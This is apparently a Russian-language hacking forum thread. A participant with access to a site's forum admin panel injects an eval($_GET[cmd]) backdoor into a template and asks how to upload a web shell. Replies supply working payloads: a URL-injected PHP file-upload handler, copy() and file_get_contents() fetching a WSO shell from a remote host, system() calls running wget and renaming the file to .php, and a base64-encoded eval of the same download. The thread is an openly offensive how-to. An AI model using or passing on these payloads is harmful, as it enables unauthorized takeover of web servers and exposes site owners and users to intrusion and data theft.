![]() |
В общем есть доступ в админку
пробую залить шелл через правку шаблона вставляю код eval($_GET[cmd]); проверяю site.ru/forum/index.php?cmd=phpinfo(); - Работает А вот когда пытаюсь залить шелл он почему то не заливается делаю вот так site.ru/forum/index.php?cmd=$url=$_GET;$content= file_get_contents($url);...ничку подскажите как ещё я могу залить шелл |
Цитата:
[/QUOTE] |
Попробуй так:
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t= шелл будет лежать site.ru/forum/название_закачиваемого_фай ла.php |
Цитата:
copy("http://сайт/wso.txt","2.php"); - не работает file_put_contents('2.php', file_get_contents('http://сайт/wso.txt')); - не работает и это тоже не работает ?cmd=system("cd /home/sait.ru/www; wget http://сайт/wso.txt"); далее ?cmd=system("cd /home/sait.ru/www; mv wso.txt wso.php"); |
eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??
Да быть такого не может чтобы через wget не заливалось... |
Цитата:
site.ru/forum/название_закачиваемого_фай ла.php а где мне название это написать? |
Цитата:
|
Цитата:
|
Цитата:
Если что в личку кинь, посмотрю |
Цитата:
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t= у меня нечего не происходит |
| Время: 21:39 |